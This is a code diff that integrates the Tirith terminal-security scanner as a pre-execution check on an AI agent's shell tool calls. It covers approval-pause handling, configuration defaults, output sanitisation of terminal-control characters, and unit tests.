+        // requiring pauses with `allow_always = false` (Hermes #3428 pattern)
+        // so users cannot permanently allow-list a tirith finding. Operational
+        // failures under `fail_open = false` hard-deny via `LeaseDenied` —
+        // never an approvable pause, since clicking through a fail-closed
+        // scan would silently turn fail-closed into fail-open.
+        //
+        // `approval_already_granted` means the user already saw and approved
+        // this specific call (including any tirith reason); skip rescanning.
+        //
+        // The scanned name is `approval.lookup_name` (the canonical tool
+        // the adapter has resolved to and will actually execute), not
+        // `approval.action_name` (the alias / discovered name the LLM
+        // used). Routing on the alias would let any alias for `shell`
+        // bypass the scan because `tirith_preflight` matches on
+        // `tool_name == "shell"`.
+        if !approval.approval_already_granted
+            && let Some(cfg) = self.tools.tirith_config()
+        {
+            use crate::tools::builtin::{TirithPreflightDecision, tirith_preflight};
+            match tirith_preflight(approval.lookup_name, approval.parameters, cfg).await {
+                TirithPreflightDecision::Allow => {}
+                TirithPreflightDecision::Approval { reason } => {
+                    // Persist the canonical resolved name (`lookup_name`) on
+                    // the pause, NOT the alias / discovery name the LLM used
+                    // (`action_name`). The router resumes by passing
+                    // `pending.action_name` back into the adapter, where it
+                    // would otherwise re-resolve the alias and risk landing
+                    // on a different tool than the one tirith just scanned.
+                    return Err(Self::gate_paused(
+                        "approval",
+                        approval.lookup_name,
+                        approval.context.current_call_id.as_deref(),
+                        approval.parameters.clone(),
+                        ironclaw_engine::ResumeKind::Approval {
+                            allow_always: false,
+                        },
+                        None,
+                        Some(approval.lease.clone()),
+                        Some(reason),
+                    ));
+                }
+                TirithPreflightDecision::Deny { reason } => {
+                    return Err(EngineError::LeaseDenied { reason });
+                }
+            }
+        }
+
         if approval.approval_already_granted {
             return Ok(());
         }
@@ -360,6 +408,7 @@ impl EffectBridgeAdapter {
                 },
                 None,
                 Some(approval.lease.clone()),
+                None,
             ));
         }
 
@@ -381,6 +430,7 @@ impl EffectBridgeAdapter {
                 },
                 None,
                 Some(approval.lease.clone()),
+                None,
             ));
         }
 
@@ -409,6 +459,7 @@ impl EffectBridgeAdapter {
                 ironclaw_engine::ResumeKind::Approval { allow_always: true },
                 None,
                 Some(approval.lease.clone()),
+                None,
             ));
         }
         Ok(())
@@ -608,6 +659,7 @@ impl EffectBridgeAdapter {
         Ok(Some(pid))
     }
 
+    #[allow(clippy::too_many_arguments)]
     fn gate_paused(
         gate_name: &str,
         action_name: &str,
@@ -616,6 +668,7 @@ impl EffectBridgeAdapter {
         resume_kind: ironclaw_engine::ResumeKind,
         resume_output: Option<serde_json::Value>,
         paused_lease: Option<CapabilityLease>,
+        reason: Option<String>,
     ) -> EngineError {
         EngineError::GatePaused {
             gate_name: gate_name.to_string(),
@@ -625,6 +678,7 @@ impl EffectBridgeAdapter {
             resume_kind: Box::new(resume_kind),
             resume_output: resume_output.map(Box::new),
             paused_lease: paused_lease.map(Box::new),
+            reason: reason.map(Box::new),
         }
     }
 
@@ -671,6 +725,7 @@ impl EffectBridgeAdapter {
                 },
                 None,
                 Some(lease.clone()),
+                None,
             )),
             _ => None,
         }
@@ -1331,6 +1386,7 @@ impl EffectBridgeAdapter {
                         },
                         None,
                         Some(lease.clone()),
+                        None,
                     ));
                 }
                 Ok(LatentActionExecution::NeedsSetup { message }) => {
@@ -1410,6 +1466,7 @@ impl EffectBridgeAdapter {
                         },
                         None,
                         Some(lease.clone()),
+                        None,
                     ));
                 }
                 AuthCheckResult::Ready => {
@@ -1451,6 +1508,7 @@ impl EffectBridgeAdapter {
                         },
                         None,
                         Some(lease.clone()),
+                        None,
                     ));
                 }
                 ToolReadiness::NeedsSetup { message } => {
@@ -1666,6 +1724,7 @@ impl EffectBridgeAdapter {
                                 },
                                 Some(output_value),
                                 None,
+                                None,
                             ));
                         }
                         ToolReadiness::NeedsSetup { ref message } => {
@@ -1766,6 +1825,7 @@ impl EffectBridgeAdapter {
                         },
                         None,
                         Some(lease.clone()),
+                        None,
                     ));
                 }
 

--- a/src/bridge/router.rs
+++ b/src/bridge/router.rs
@@ -1159,6 +1159,7 @@ async fn execute_pending_gate_action(
             resume_kind,
             resume_output,
             paused_lease,
+            reason,
         }) => {
             let display_parameters = state
                 .effect_adapter
@@ -1178,11 +1179,17 @@ async fn execute_pending_gate_action(
                 call_id,
                 parameters: *parameters,
                 display_parameters,
-                description: format!(
-                    "Tool '{}' requires {}.",
-                    action_name,
-                    resume_kind.kind_name()
-                ),
+                // Prefer the engine-supplied reason (e.g. tirith finding
+                // text) and fall back to the generic "Tool 'X' requires Y."
+                // string when no reason was attached. The thread-outcome
+                // arm later in this file uses the same shape.
+                description: reason.as_deref().cloned().unwrap_or_else(|| {
+                    format!(
+                        "Tool '{}' requires {}.",
+                        action_name,
+                        resume_kind.kind_name()
+                    )
+                }),
                 resume_kind: *resume_kind,
                 created_at: chrono::Utc::now(),
                 expires_at: chrono::Utc::now() + chrono::Duration::minutes(30),
@@ -3994,6 +4001,7 @@ async fn await_thread_outcome(
             resume_kind,
             resume_output,
             paused_lease,
+            reason,
         } => {
             use crate::gate::pending::PendingGate;
 
@@ -4030,11 +4038,13 @@ async fn await_thread_outcome(
                 call_id,
                 parameters,
                 display_parameters: Some(redacted_params.clone()),
-                description: format!(
-                    "Tool '{}' requires {} (gate: {gate_name})",
-                    action_name,
-                    resume_kind.kind_name()
-                ),
+                description: reason.as_deref().cloned().unwrap_or_else(|| {
+                    format!(
+                        "Tool '{}' requires {} (gate: {gate_name})",
+                        action_name,
+                        resume_kind.kind_name()
+                    )
+                }),
                 resume_kind: resume_kind.clone(),
                 created_at: chrono::Utc::now(),
                 expires_at: chrono::Utc::now() + chrono::Duration::minutes(30),

--- a/src/config/mod.rs
+++ b/src/config/mod.rs
@@ -66,7 +66,7 @@ pub use self::oauth::OAuthConfig;
 pub use self::relay::RelayConfig;
 pub use self::routines::RoutineConfig;
 pub use self::safety::SafetyConfig;
-use self::safety::resolve_safety_config;
+use self::safety::{resolve_safety_config, resolve_tirith_config};
 pub use self::sandbox::{AcpModeConfig, ClaudeCodeConfig, SandboxModeConfig};
 pub use self::search::WorkspaceSearchConfig;
 pub use self::secrets::SecretsConfig;
@@ -109,6 +109,9 @@ pub struct Config {
     pub channels: ChannelsConfig,
     pub agent: AgentConfig,
     pub safety: SafetyConfig,
+    /// Pre-exec scanning of shell tool calls via the external Tirith CLI.
+    /// See <https://github.com/sheeki03/tirith> for the upstream project.
+    pub tirith: crate::tools::builtin::TirithConfig,
     pub wasm: WasmConfig,
     pub secrets: SecretsConfig,
     pub builder: BuilderModeConfig,
@@ -205,6 +208,15 @@ impl Config {
             safety: SafetyConfig {
                 max_output_length: 100_000,
                 injection_check_enabled: false,
+            },
+            // Production default for `tirith.enabled` is `true`, but tests
+            // run on machines/CI that may happen to have `tirith` on PATH;
+            // leaving it enabled would surface surprise approval pauses in
+            // suites unrelated to tirith. Tests that exercise tirith opt
+            // back in via `ToolRegistry::with_tirith_config(...)`.
+            tirith: crate::tools::builtin::TirithConfig {
+                enabled: false,
+                ..crate::tools::builtin::TirithConfig::default()
             },
             wasm: WasmConfig {
                 enabled: false,
@@ -592,6 +604,7 @@ impl Config {
             channels,
             agent: AgentConfig::resolve(settings)?,
             safety: resolve_safety_config(settings)?,
+            tirith: resolve_tirith_config(settings)?,
             wasm: WasmConfig::resolve(settings)?,
             secrets: SecretsConfig::resolve().await?,
             builder: BuilderModeConfig::resolve(settings)?,

--- a/src/config/safety.rs
+++ b/src/config/safety.rs
@@ -1,5 +1,8 @@
+use std::time::Duration;
+
 use crate::config::helpers::{db_first_bool, db_first_or_default};
 use crate::error::ConfigError;
+use crate::tools::builtin::TirithConfig;
 
 pub use ironclaw_safety::SafetyConfig;
 
@@ -18,6 +21,34 @@ pub(crate) fn resolve_safety_config(
             ss.injection_check_enabled,
             defaults.injection_check_enabled,
             "SAFETY_INJECTION_CHECK_ENABLED",
+        )?,
+    })
+}
+
+/// Resolve `TirithConfig` using the same DB-first → env → default precedence
+/// as the rest of the safety subsystem. See [`crate::tools::builtin::TirithConfig`].
+pub(crate) fn resolve_tirith_config(
+    settings: &crate::settings::Settings,
+) -> Result<TirithConfig, ConfigError> {
+    let ss = &settings.safety;
+    let defaults = crate::settings::SafetySettings::default();
+    let timeout_ms = db_first_or_default(
+        &ss.tirith_timeout_ms,
+        &defaults.tirith_timeout_ms,
+        "SAFETY_TIRITH_TIMEOUT_MS",
+    )?;
+    Ok(TirithConfig {
+        enabled: db_first_bool(
+            ss.tirith_enabled,
+            defaults.tirith_enabled,
+            "SAFETY_TIRITH_ENABLED",
+        )?,
+        bin: db_first_or_default(&ss.tirith_bin, &defaults.tirith_bin, "SAFETY_TIRITH_BIN")?,
+        timeout: Duration::from_millis(timeout_ms),
+        fail_open: db_first_bool(
+            ss.tirith_fail_open,
+            defaults.tirith_fail_open,
+            "SAFETY_TIRITH_FAIL_OPEN",
         )?,
     })
 }

--- a/src/settings.rs
+++ b/src/settings.rs
@@ -802,10 +802,37 @@ pub struct SafetySettings {
     /// Whether injection check is enabled.
     #[serde(default = "default_true")]
     pub injection_check_enabled: bool,
+
+    /// Whether the Tirith pre-exec scanner runs on shell tool calls.
+    /// See <https://github.com/sheeki03/tirith>.
+    #[serde(default = "default_true")]
+    pub tirith_enabled: bool,
+
+    /// Path or PATH-resolvable name of the Tirith binary.
+    #[serde(default = "default_tirith_bin")]
+    pub tirith_bin: String,
+
+    /// Subprocess timeout for a single Tirith scan, in milliseconds.
+    #[serde(default = "default_tirith_timeout_ms")]
+    pub tirith_timeout_ms: u64,
+
+    /// `true` (default): operational failures (missing binary, timeout, etc.)
+    /// fall through to the existing approval logic; `false`: operational
+    /// failures hard-deny the tool call.
+    #[serde(default = "default_true")]
+    pub tirith_fail_open: bool,
 }
 
 fn default_max_output_length() -> usize {
     100_000
+}
+
+fn default_tirith_bin() -> String {
+    "tirith".to_string()
+}
+
+fn default_tirith_timeout_ms() -> u64 {
+    5_000
 }
 
 impl Default for SafetySettings {
@@ -813,6 +840,10 @@ impl Default for SafetySettings {
         Self {
             max_output_length: default_max_output_length(),
             injection_check_enabled: true,
+            tirith_enabled: true,
+            tirith_bin: default_tirith_bin(),
+            tirith_timeout_ms: default_tirith_timeout_ms(),
+            tirith_fail_open: true,
         }
     }
 }

--- a/src/tools/builtin/mod.rs
+++ b/src/tools/builtin/mod.rs
@@ -21,6 +21,7 @@ pub(crate) mod shell;
 pub mod skill_tools;
 pub mod system;
 mod time;
+pub mod tirith_guard;
 mod tool_info;
 
 pub use echo::EchoTool;
@@ -52,6 +53,10 @@ pub use shell::ShellTool;
 pub use skill_tools::{SkillInstallTool, SkillListTool, SkillRemoveTool, SkillSearchTool};
 pub use system::{SystemToolsListTool, SystemVersionTool};
 pub use time::TimeTool;
+pub use tirith_guard::{
+    TirithAction, TirithConfig, TirithFinding, TirithPreflightDecision, TirithVerdict,
+    tirith_preflight,
+};
 pub use tool_info::ToolInfoTool;
 mod html_converter;
 pub mod image_analyze;

--- a/src/tools/builtin/shell.rs
+++ b/src/tools/builtin/shell.rs
@@ -388,7 +388,7 @@ pub fn classify_command_risk(command: &str) -> RiskLevel {
 ///
 /// Handles both the normal case (a JSON object with a `"command"` key) and the
 /// rare case where the LLM provider returns string-encoded JSON.
-fn extract_command_param(params: &serde_json::Value) -> Option<String> {
+pub(crate) fn extract_command_param(params: &serde_json::Value) -> Option<String> {
     params
         .get("command")
         .and_then(|c| c.as_str().map(String::from))

--- a/src/tools/builtin/tirith_guard.rs
+++ b/src/tools/builtin/tirith_guard.rs
@@ -1,0 +1,691 @@
+//! Pre-execution scanning of shell tool arguments via the external
+//! [Tirith](https://github.com/sheeki03/tirith) terminal-security CLI.
+//!
+//! Three-way decision exposed at the inline approval call sites:
+//!
+//! - [`TirithPreflightDecision::Allow`] — proceed with normal approval logic
+//!   (tirith disabled, non-shell tool, allow verdict, or fail-open + operational
+//!   failure).
+//! - [`TirithPreflightDecision::Approval`] — surface a pause through the existing
+//!   approval shape with a rich tirith reason. `allow_always = false`, so users
+//!   cannot permanently allow-list a tirith finding.
+//! - [`TirithPreflightDecision::Deny`] — hard rejection, used ONLY for
+//!   fail-closed operational failures (missing binary, timeout, spawn error,
+//!   unknown exit). Never an approval — letting a user click through a
+//!   fail-closed scan would silently turn fail-closed into fail-open.
+//!
+//! The Tirith CLI ships its own daemon mode for IDE integration; this module
+//! always passes `--no-daemon` so each preflight is a deterministic one-shot
+//! subprocess.
+
+use std::path::PathBuf;
+use std::process::Stdio;
+use std::time::Duration;
+
+use serde::Deserialize;
+use tokio::io::AsyncReadExt;
+use tokio::process::Command;
+
+use crate::tools::builtin::shell;
+
+const FINDINGS_CAP: usize = 50;
+const REASON_CAP: usize = 500;
+const COMMAND_TRUNC: usize = 80;
+/// Maximum stdout bytes parsed from the tirith subprocess. The real CLI
+/// emits a few KiB of JSON per scan; this cap defends against a broken
+/// or shadowed binary that would otherwise emit unbounded output and
+/// pin memory before the timeout fires.
+const STDOUT_CAP_BYTES: u64 = 256 * 1024;
+
+/// Runtime configuration for the tirith preflight.
+#[derive(Debug, Clone)]
+pub struct TirithConfig {
+    /// Master switch. When `false`, [`tirith_preflight`] short-circuits to
+    /// [`TirithPreflightDecision::Allow`] before any subprocess is spawned.
+    pub enabled: bool,
+    /// Bare name (resolved via `which::which`) or explicit path to the tirith
+    /// binary. Tilde-prefixed paths are expanded via `dirs::home_dir`.
+    pub bin: String,
+    /// Maximum time the subprocess may run. Exceeding this counts as an
+    /// operational failure (treated per [`Self::fail_open`]).
+    pub timeout: Duration,
+    /// `true` (default): operational failures map to [`TirithPreflightDecision::Allow`]
+    /// so an unconfigured user with no tirith binary sees no behavior change.
+    /// `false`: operational failures map to [`TirithPreflightDecision::Deny`]
+    /// (hard rejection — never approvable).
+    pub fail_open: bool,
+}
+
+impl Default for TirithConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            bin: "tirith".to_string(),
+            timeout: Duration::from_secs(5),
+            fail_open: true,
+        }
+    }
+}
+
+/// Internal verdict from running the tirith subprocess.
+#[derive(Debug, Clone)]
+pub enum TirithVerdict {
+    Allow,
+    /// Block / Warn / WarnAck (exit 1 / 2 / 3 — Hermes #3428 pattern). All
+    /// surface as approval prompts; only Allow skips the prompt.
+    Approvable {
+        action: TirithAction,
+        reason: String,
+        findings: Vec<TirithFinding>,
+    },
+    /// Operational failure (missing binary, timeout, spawn error, unknown
+    /// exit) under `fail_open = false`.
+    FailClosed {
+        summary: String,
+    },
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum TirithAction {
+    Block,
+    Warn,
+    WarnAck,
+}
+
+/// Three-way decision exposed to inline approval call sites.
+///
+/// Critical: fail-closed operational failures become [`Self::Deny`] — never
+/// [`Self::Approval`]. Approval-clickthrough on a fail-closed scan would
+/// defeat fail-closed semantics.
+///
+/// The helper does not know the channel context (relay vs DM, etc.). Relay-
+/// channel rejection of an `Approval` outcome is a CALL-SITE concern: the
+/// caller converts `Approval { reason }` into a rejection when the channel
+/// requires it (e.g. v1 dispatcher's existing non-DM relay auto-deny).
+#[derive(Debug, Clone)]
+pub enum TirithPreflightDecision {
+    Allow,
+    Approval { reason: String },
+    Deny { reason: String },
+}
+
+#[derive(Debug, Clone, Default, Deserialize)]
+pub struct TirithFinding {
+    #[serde(default)]
+    pub rule_id: String,
+    #[serde(default)]
+    pub severity: String,
+    #[serde(default)]
+    pub title: String,
+    #[serde(default)]
+    pub description: String,
+}
+
+#[derive(Debug, Clone, Default, Deserialize)]
+struct TirithVerdictJson {
+    #[serde(default)]
+    findings: Vec<TirithFinding>,
+    #[serde(default)]
+    approval_description: Option<String>,
+}
+
+/// Resolve [`TirithConfig::bin`] to an executable path.
+///
+/// - Bare names (no path separator) delegate to `which::which`, which already
+///   handles Unix executable bits AND Windows PATHEXT (`.exe` / `.bat` / `.cmd`).
+/// - Tilde-prefixed paths (`~/...`) are expanded via `dirs::home_dir`.
+/// - Explicit paths must exist as a regular file. On Unix the executable bit
+///   is also checked; on Windows the OS gates exec on file extension and image
+///   header, so `is_file()` is sufficient.
+///
+/// Returns `None` when the binary cannot be located or is not executable.
+pub fn resolve_tirith_bin(configured: &str) -> Option<PathBuf> {
+    let trimmed = configured.trim();
+    if trimmed.is_empty() {
+        return None;
+    }
+
+    let has_separator = trimmed.contains('/') || trimmed.contains('\\');
+
+    if !has_separator {
+        // Bare names — including the literal `~` (no path separator) — go
+        // through the PATH lookup. `which::which("~")` will fail on every
+        // platform we care about; that's the correct outcome for a config
+        // value that doesn't name a binary.
+        return which::which(trimmed).ok();
+    }
+
+    let expanded = if let Some(stripped) = trimmed.strip_prefix("~/") {
+        match dirs::home_dir() {
+            Some(home) => home.join(stripped),
+            None => return None,
+        }
+    } else {
+        PathBuf::from(trimmed)
+    };
+
+    if is_executable_file(&expanded) {
+        Some(expanded)
+    } else {
+        None
+    }
+}
+
+/// Cross-platform "is this a real, runnable file?" check for explicit paths.
+#[cfg(unix)]
+fn is_executable_file(path: &std::path::Path) -> bool {
+    use std::os::unix::fs::PermissionsExt;
+    match std::fs::metadata(path) {
+        Ok(meta) => meta.is_file() && (meta.permissions().mode() & 0o111 != 0),
+        Err(_) => false,
+    }
+}
+
+#[cfg(not(unix))]
+fn is_executable_file(path: &std::path::Path) -> bool {
+    match std::fs::metadata(path) {
+        Ok(meta) => meta.is_file(),
+        Err(_) => false,
+    }
+}
+
+/// Run the tirith subprocess against `cmd` and map its outcome to a verdict.
+///
+/// Exit codes are the source of truth (0/1/2/3 → Allow/Block/Warn/WarnAck).
+/// The JSON body is parsed only to enrich the reason string — a parse failure
+/// on a non-zero exit still produces an `Approvable` verdict with a fallback
+/// reason.
+pub async fn check_command(cmd: &str, cfg: &TirithConfig) -> TirithVerdict {
+    if !cfg.enabled {
+        return TirithVerdict::Allow;
+    }
+
+    let Some(bin) = resolve_tirith_bin(&cfg.bin) else {
+        tracing::debug!(
+            configured = %cfg.bin,
+            "tirith binary not found; treating per fail_open"
+        );
+        return fail(
+            cfg.fail_open,
+            format!("tirith binary `{}` not found", cfg.bin),
+        );
+    };
+
+    let mut command = Command::new(&bin);
+    command
+        .arg("check")
+        .arg("--json")
+        .arg("--non-interactive")
+        .arg("--no-daemon")
+        .arg("--shell")
+        .arg("posix")
+        .arg("--")
+        .arg(cmd)
+        .stdin(Stdio::null())
+        .stdout(Stdio::piped())
+        // stderr is intentionally `null`. We only consume the exit code +
+        // stdout JSON; if stderr were piped without a draining task the
+        // child could block on a full pipe and starve until the timeout
+        // — which under the default `fail_open = true` would silently
+        // become an Allow.
+        .stderr(Stdio::null())
+        .kill_on_drop(true);
+
+    let mut child = match command.spawn() {
+        Ok(child) => child,
+        Err(e) => {
+            tracing::debug!(error = %e, "tirith spawn failed");
+            return fail(cfg.fail_open, format!("tirith spawn failed: {e}"));
+        }
+    };
+
+    let mut stdout_buf = Vec::new();
+    let stdout_handle = child.stdout.take();
+    let read_fut = async {
+        if let Some(out) = stdout_handle {
+            // Parse at most STDOUT_CAP_BYTES of JSON, then continue
+            // draining any further stdout into a sink so the child does
+            // not block on a full pipe. Without the trailing drain, a
+            // broken binary that prints more than the cap would deadlock
+            // until the timeout fires; under fail_open=true that would
+            // silently degrade to Allow.
+            let mut limited = out.take(STDOUT_CAP_BYTES);
+            let _ = limited.read_to_end(&mut stdout_buf).await;
+            let mut tail = limited.into_inner();
+            let mut sink = [0u8; 4096];
+            while let Ok(n) = tail.read(&mut sink).await {
+                if n == 0 {
+                    break;
+                }
+            }
+        }
+        child.wait().await
+    };
+
+    let status = match tokio::time::timeout(cfg.timeout, read_fut).await {
+        Ok(Ok(status)) => status,
+        Ok(Err(e)) => {
+            tracing::debug!(error = %e, "tirith wait failed");
+            return fail(cfg.fail_open, format!("tirith wait failed: {e}"));
+        }
+        Err(_) => {
+            tracing::debug!(
+                timeout_ms = cfg.timeout.as_millis() as u64,
+                "tirith timed out"
+            );
+            return fail(cfg.fail_open, "tirith timed out".to_string());
+        }
+    };
+
+    let parsed: TirithVerdictJson = serde_json::from_slice(&stdout_buf).unwrap_or_default();
+    let action = match status.code() {
+        Some(0) => return TirithVerdict::Allow,
+        Some(1) => TirithAction::Block,
+        Some(2) => TirithAction::Warn,
+        Some(3) => TirithAction::WarnAck,
+        Some(other) => {
+            tracing::debug!(exit = other, "tirith returned unknown exit code");
+            return fail(cfg.fail_open, format!("tirith returned exit code {other}"));
+        }
+        None => {
+            tracing::debug!("tirith terminated by signal");
+            return fail(cfg.fail_open, "tirith terminated by signal".to_string());
+        }
+    };
+
+    let mut findings = parsed.findings;
+    if findings.len() > FINDINGS_CAP {
+        findings.truncate(FINDINGS_CAP);
+    }
+    let reason = build_reason(parsed.approval_description.as_deref(), &findings, cmd);
+
+    TirithVerdict::Approvable {
+        action,
+        reason,
+        findings,
+    }
+}
+
+fn fail(fail_open: bool, summary: String) -> TirithVerdict {
+    if fail_open {
+        TirithVerdict::Allow
+    } else {
+        // Sanitize even the operational-failure summary — it contains the
+        // configured `bin` path, which a hostile environment could populate
+        // with control bytes specifically to land in the user-facing
+        // approval/denial surface.
+        TirithVerdict::FailClosed {
+            summary: sanitize_for_display(&summary),
+        }
+    }
+}
+
+fn build_reason(
+    approval_description: Option<&str>,
+    findings: &[TirithFinding],
+    cmd: &str,
+) -> String {
+    let head = match approval_description {
+        Some(s) if !s.trim().is_empty() => s.trim().to_string(),
+        _ => {
+            if findings.is_empty() {
+                "tirith flagged a security issue in the proposed command".to_string()
+            } else {
+                let mut parts = Vec::new();
+                for f in findings.iter().take(3) {
+                    let title = if f.title.trim().is_empty() {
+                        f.rule_id.clone()
+                    } else {
+                        f.title.clone()
+                    };
+                    let sev = if f.severity.trim().is_empty() {
+                        "FINDING".to_string()
+                    } else {
+                        f.severity.clone()
+                    };
+                    let desc_short = truncate(&f.description, 120);
+                    if desc_short.is_empty() {
+                        parts.push(format!("[{sev}] {title}"));
+                    } else {
+                        parts.push(format!("[{sev}] {title}: {desc_short}"));
+                    }
+                }
+                parts.join("; ")
+            }
+        }
+    };
+
+    let cmd_short = truncate(cmd, COMMAND_TRUNC);
+    let combined = if cmd_short.is_empty() {
+        head
+    } else {
+        format!("{head} (command: {cmd_short})")
+    };
+    // Sanitize BEFORE the cap so the cap counts the actual displayed chars.
+    // The reason flows into approval prompts and SSE/TUI status surfaces;
+    // because tirith specifically catches terminal-control attacks, we must
+    // strip ESC / bidi / zero-width / other control chars from the
+    // suspect command and finding text before reflecting them back.
+    truncate(&sanitize_for_display(&combined), REASON_CAP)
+}
+
+/// Neutralize text destined for user-facing approval / status surfaces.
+///
+/// Tirith's findings and the truncated command can contain the very
+/// terminal-control payloads tirith was scanning for (ANSI escapes, bidi
+/// override codepoints, zero-width characters, hidden multiline). Rendering
+/// those raw in TUI / SSE / channel approval cards would defeat the
+/// integration's purpose by letting the attack reach the operator's screen
+/// unchanged. This helper:
+///
+/// - Collapses CR / LF / TAB / VT / FF and runs of spaces into a single space.
+/// - Drops C0 (U+0000–U+001F) and DEL (U+007F) controls.
+/// - Drops C1 controls (U+0080–U+009F).
+/// - Drops Unicode bidi controls (U+200E / U+200F, U+202A–U+202E,
+///   U+2066–U+2069) and the Mongolian Free Variation Selector U+180E.
+/// - Drops zero-width / invisible separators (U+200B / U+200C / U+200D /
+///   U+FEFF / U+00AD / U+115F / U+1160 / U+3164).
+///
+/// The result is always a single line of safe-to-print characters.
+fn sanitize_for_display(input: &str) -> String {
+    let mut out = String::with_capacity(input.len());
+    let mut prev_space = false;
+    for c in input.chars() {
+        let mapped = match c {
+            // Collapse all line breaks / tabs / vertical-whitespace to one space.
+            '\n' | '\r' | '\t' | '\x0B' | '\x0C' => Some(' '),
+            // C0 control range (excluding the whitespace handled above).
+            c if (c as u32) < 0x20 => None,
+            // DEL.
+            '\x7F' => None,
+            // C1 control range.
+            c if matches!(c as u32, 0x80..=0x9F) => None,
+            // Bidi formatting controls (override / isolate).
+            '\u{200E}' | '\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}' => None,
+            // Mongolian Free Variation Selector (used in some bidi attacks).
+            '\u{180E}' => None,
+            // Zero-width spacers and joiners.
+            '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' => None,
+            // Soft hyphen.
+            '\u{00AD}' => None,
+            // Hangul fillers and Hangul Filler that can hide content.
+            '\u{115F}' | '\u{1160}' | '\u{3164}' => None,
+            other => Some(other),
+        };
+        if let Some(c) = mapped {
+            if c == ' ' {
+                if !prev_space && !out.is_empty() {
+                    out.push(' ');
+                    prev_space = true;
+                }
+            } else {
+                out.push(c);
+                prev_space = false;
+            }
+        }
+    }
+    if out.ends_with(' ') {
+        out.pop();
+    }
+    out
+}
+
+/// Truncate `s` to at most `max_chars` Unicode scalar values, appending an
+/// ellipsis when content was dropped.
+///
+/// Per the repo's iterator-first convention, walks the string once via
+/// `chars()` rather than counting length up front. This also makes the cap
+/// a stable user-visible size — passing `COMMAND_TRUNC = 80` means "up to
+/// 80 displayed characters" instead of "up to 80 UTF-8 bytes" (which would
+/// shrink the visible cap on multi-byte inputs).
+fn truncate(s: &str, max_chars: usize) -> String {
+    let mut chars = s.chars();
+    let mut out: String = chars.by_ref().take(max_chars).collect();
+    if chars.next().is_some() {
+        out.push('…');
+    }
+    out
+}
+
+/// Adapter for inline approval call sites. Returns a three-way decision.
+///
+/// - Tirith disabled, non-shell tool, or no `command` parameter → [`TirithPreflightDecision::Allow`].
+/// - Tirith allow → [`TirithPreflightDecision::Allow`].
+/// - Tirith block / warn / warn_ack → [`TirithPreflightDecision::Approval`].
+/// - Tirith operational failure under `fail_open = false` → [`TirithPreflightDecision::Deny`].
+///
+/// The helper deliberately knows nothing about relay channels, sessions, or
+/// auto-approve flags — those are call-site concerns layered on top of the
+/// returned decision.
+pub async fn tirith_preflight(
+    tool_name: &str,
+    parameters: &serde_json::Value,
+    cfg: &TirithConfig,
+) -> TirithPreflightDecision {
+    if !cfg.enabled {
+        return TirithPreflightDecision::Allow;
+    }
+
+    if tool_name != "shell" {
+        return TirithPreflightDecision::Allow;
+    }
+
+    let Some(cmd) = shell::extract_command_param(parameters) else {
+        return TirithPreflightDecision::Allow;
+    };
+
+    if cmd.trim().is_empty() {
+        return TirithPreflightDecision::Allow;
+    }
+
+    match check_command(&cmd, cfg).await {
+        TirithVerdict::Allow => TirithPreflightDecision::Allow,
+        TirithVerdict::Approvable { reason, .. } => TirithPreflightDecision::Approval { reason },
+        TirithVerdict::FailClosed { summary } => TirithPreflightDecision::Deny {
+            reason: format!("Tirith unavailable in fail-closed mode: {summary}"),
+        },
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[cfg(unix)]
+    use std::io::Write;
+
+    #[test]
+    fn empty_bin_returns_none() {
+        assert!(resolve_tirith_bin("").is_none());
+        assert!(resolve_tirith_bin("   ").is_none());
+    }
+
+    #[test]
+    fn missing_explicit_path_returns_none() {
+        assert!(resolve_tirith_bin("/nonexistent/tirith-xyz-abc").is_none());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn explicit_path_executable_file_resolves() {
+        use std::os::unix::fs::PermissionsExt;
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let path = tmp.path().join("fake-tirith");
+        let mut f = std::fs::File::create(&path).expect("create");
+        writeln!(f, "#!/bin/sh").expect("write");
+        let mut perms = std::fs::metadata(&path).expect("meta").permissions();
+        perms.set_mode(0o755);
+        std::fs::set_permissions(&path, perms).expect("chmod");
+        let resolved = resolve_tirith_bin(path.to_str().unwrap()).expect("resolve");
+        assert_eq!(resolved, path);
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn explicit_path_non_executable_file_returns_none() {
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let path = tmp.path().join("not-exec");
+        std::fs::write(&path, "x").expect("write");
+        // No chmod +x — should be rejected.
+        assert!(resolve_tirith_bin(path.to_str().unwrap()).is_none());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn directory_rejected() {
+        let tmp = tempfile::tempdir().expect("tempdir");
+        assert!(resolve_tirith_bin(tmp.path().to_str().unwrap()).is_none());
+    }
+
+    #[test]
+    fn truncate_handles_multi_byte_boundary() {
+        let s = "héllo wörld";
+        let out = truncate(s, 4);
+        assert!(out.ends_with('…'));
+        assert!(out.len() <= 8);
+    }
+
+    #[test]
+    fn sanitize_strips_ansi_escape_sequences() {
+        // Classic ANSI red-then-reset sequence wrapped around suspicious text.
+        let input = "before \x1b[31mRED\x1b[0m after";
+        let out = sanitize_for_display(input);
+        assert!(!out.contains('\x1b'), "ESC must not survive: {out:?}");
+        assert!(
+            out.contains("RED"),
+            "non-control text must be preserved: {out:?}"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_bidi_overrides() {
+        // RLO + LRO + PDF + isolate codepoints — the bidi-attack family.
+        let input = "echo\u{202E}drowssap\u{202C}";
+        let out = sanitize_for_display(input);
+        assert!(!out.contains('\u{202E}'));
+        assert!(!out.contains('\u{202C}'));
+        assert_eq!(out, "echodrowssap");
+    }
+
+    #[test]
+    fn sanitize_strips_zero_width_characters() {
+        let input = "ls\u{200B}\u{200C}\u{200D}\u{FEFF}-la";
+        let out = sanitize_for_display(input);
+        assert_eq!(out, "ls-la");
+    }
+
+    #[test]
+    fn sanitize_collapses_newlines_to_single_space() {
+        let input = "line1\nline2\r\nline3\n\n\nline4";
+        let out = sanitize_for_display(input);
+        assert_eq!(out, "line1 line2 line3 line4");
+    }
+
+    #[test]
+    fn sanitize_drops_c1_controls_and_del() {
+        // U+0080 (C1) and U+007F (DEL) flank visible text.
+        let input = "a\u{0080}b\x7Fc";
+        let out = sanitize_for_display(input);
